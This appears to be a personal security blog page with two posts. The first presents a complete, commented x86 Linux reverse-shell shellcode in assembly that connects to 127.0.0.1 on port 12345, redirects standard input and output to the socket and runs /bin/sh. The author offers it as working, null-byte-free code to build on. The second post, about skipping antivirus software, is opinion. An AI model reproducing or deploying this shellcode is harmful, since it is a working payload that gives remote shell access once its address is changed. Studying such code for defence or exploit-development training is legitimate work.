x86 reverse shellcode documented example

Writing a shellcode is hard, documented references are scarce and figuring out how to translate function calls into assembly is a pain. I’m posting here a shellcode I wrote a while back. It’s not a perfect example, it can be shorter and more elegant, but it works and does not contain null bytes – It should get you started if you need help writing your own variety of shellcode.

This is a reverse shell code, it will connect back to 127.0.0.1 on port 12345 hoping to find a listening server and provide a shell.

# x86 linux reverse shellcode example
# aviran.org
 
xor eax, eax        # setting eax,ebx,edx to zero
xor ebx, ebx
xor edx, edx
 
push 0x6            # pushing 6,1,2 to the stack
push 0x1            # these are the values for
push 0x2            # socket(2,1,6)
mov ecx, esp        # set args for call
mov bl, 1           # 1 means socket()
mov al, 0x66        # 0x66 means sys-socket
int 0x80            # call socket()
mov esi, eax        # sockfd
xor ebx, ebx        # ebx = 0
xor ecx, ecx        # ebx = 0
xor edx, edx        # ebx = 0
mov al, 0x66        # socket syscalls
 
push ebx            # padding
push ebx            # padding
mov bl, 0x3         # ebx = 3 = connect()
 
mov dl,0x1          # pushing sockaddr_in into memory
shl edx,24          # IP,Port,AF_INET, cant push word so pushing port and AF_INET together
mov dl,0x7f         # setting edx to be 0x0100007f - 127.0.0.1
push edx
xor edx,edx         # setting edx to be 0x39300002 - port 12345, AF_INET
mov dx,0x3930       # this is done to avoid null bytes
shl edx,16
mov dl,0x2
push edx
 
mov ecx, esp        # saving location of struct
                    # args for connect
push 0x10           # 0x10 size of struct
push ecx            # ecx - pointer to struct
push esi            # esi sockfd
mov ecx, esp       
int 0x80            # call connect
 
xor eax, eax
xor ebx,ebx
xor ecx,ecx
mov ebx,esi         # sockfd
mov al,0x3f         # dup2
mov cl, 0x2         # ecx = 2 = stderr
int 0x80            # call dup2()
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 1 = stdout
int 0x80            # call dup2
 
xor eax, eax
mov al,0x3f
dec cl              # cl = 0 = stdin
int 0x80            # call dup2
 
xor eax,eax         #
xor ecx,ecx         #
xor edx,edx         #
 
mov al,11           # execve
push edx            # push 0 for end of string
push 0x68732f6e     # pushing //bin/sh
push 0x69622f2f
mov ebx, esp        # pointer to string
push edx            # push null
mov edx,esp         # edx is third var, gets null
push ebx            # push var to stack
mov ecx,esp         # set second variable
int 0x80            # make the call

Life without an Anti Virus

If you have a virus or a trojan running around on your machine it is most likely you yourself are the source of the infection. Only on very rare auctions a hostile program can infiltrate into your operating system all on it’s own, meaning that if you got infected you took an active part somewhere in the process of the infection. It may have been that USB Flash Drive you got from friend and connected to your machine, maybe you downloaded some pirated software that packed some unwanted additions or maybe it was that adult website that asked for you permission to install some Add On that will allow you to watch some of it’s video.

After realizing a while ago, about when windows 95 was still around, I decided to stop using an anti virus software on a regular basis because it takes a lot of computer resources thus slowing down the machine. I do install an anti virus program once a year or so and scan my machine to make sure nothing got by me, I prefer to use Avast anti virus which doesn’t embed itself into Windows and offers a pre-boot scan.

I’m usually not too concerned about viruses/worms/etc but every once in while a computer security guy needs to download and install some shady program from some shady website. Which lead me to writing this post, postponing my decision whether to download or not a 100% clean virus free copy of IDA Pro 6.